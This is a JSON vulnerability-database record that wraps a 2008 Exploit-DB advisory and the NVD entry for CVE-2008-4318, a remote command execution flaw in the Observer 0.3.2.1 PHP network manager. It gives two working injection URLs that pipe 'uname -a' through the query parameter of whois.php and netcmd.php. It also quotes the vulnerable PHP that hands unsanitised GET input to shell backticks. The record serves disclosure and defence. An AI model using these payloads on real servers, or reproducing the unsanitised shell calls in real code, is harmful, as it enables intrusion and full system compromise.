{"id": "EDB-ID:6559", "hash": "e04a948b90d842596a31d65ab729255b", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities", "description": "Observer 0.3.2.1 Multiple Remote Command Execution Vulnerabilities. CVE-2008-4318. Webapps exploit for php platform", "published": "2008-09-24T00:00:00", "modified": "2008-09-24T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/6559/", "reporter": "dun", "references": [], "cvelist": ["CVE-2008-4318"], "lastseen": "2016-02-01T00:07:26", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2016-02-01T00:07:26"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-4318"]}], "modified": "2016-02-01T00:07:26"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/6559/", "sourceData": "\n :::::::-. ... ::::::. :::.\n ;;, `';, ;; ;;;`;;;;, `;;;\n `[[ [[[[' [[[ [[[[[. '[[\n $$, $$$$ $$$ $$$ \"Y$c$$\n 888_,o8P'88 .d888 888 Y88\n MMMMP\"` \"YmmMMMM\"\" MMM YM\n\n [ Discovered by dun \\ dun[at]strcpy.pl ]\n\n #########################################################\n # [ observer <= 0.3.2.1 ] Remote Command Execution #\n #########################################################\n #\n # Script: \"Observer is an autodiscovering PHP/MySQL/SNMP/CDP based network management system focused primarily on Cisco and Linux/BSD networks.\"\n #\n # Script site: http://www.project-observer.org/\n # Download: http://freshmeat.net/projects/observer/\n #\n # Vuln: \n # (1) http://site.com/[observer-0.3.2.1]/whois.php?query=|uname -a\n # (2) http://site.com/[observer-0.3.2.1]/netcmd.php?cmd=nmap&query=|uname -a \n #\n #\n # Bug(1): ./observer-0.3.2.1/html/whois.php\n #\n # ...\n # \t$output = `/usr/bin/whois $_GET[query] | grep -v \\%`;\n #\t$output = trim($output);\n #\techo(\"<pre>$output</pre>\");\n # ... \t \n #\n #\n # Bug(2): ./observer-0.3.2.1/html/netcmd.php\n #\n # ...\n # switch ($_GET[cmd]) {\n # case 'whois':\n # $output = `/usr/bin/whois $_GET[query] | grep -v \\%`;\n # break;\n # case 'ping':\n # $output = `/bin/ping $_GET[query]`;\n # break;\n # case 'tracert':\n # $output = `/usr/sbin/traceroute $_GET[query]`;\n # break;\n # case 'nmap':\n # $output = `/usr/bin/nmap $_GET[query]`;\n # break;\n # }\n # $output = trim($output);\n # echo(\"<pre>$output</pre>\");\n # ... \t\t\t \t\t \n #\n #\n ###############################################\n # Greetz: D3m0n_DE * str0ke * and otherz..\n ###############################################\n\n [ dun / 2008 ] \n\n*******************************************************************************************\n\n# milw0rm.com [2008-09-24]\n", "osvdbidlist": ["48912", "48913"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:09:28", "bulletinFamily": "NVD", "description": "Observer 0.3.2.1 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the query parameter to (1) whois.php or (2) netcmd.php.", "modified": "2017-09-29T01:32:00", "id": "CVE-2008-4318", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4318", "published": "2008-09-29T19:25:00", "title": "CVE-2008-4318", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}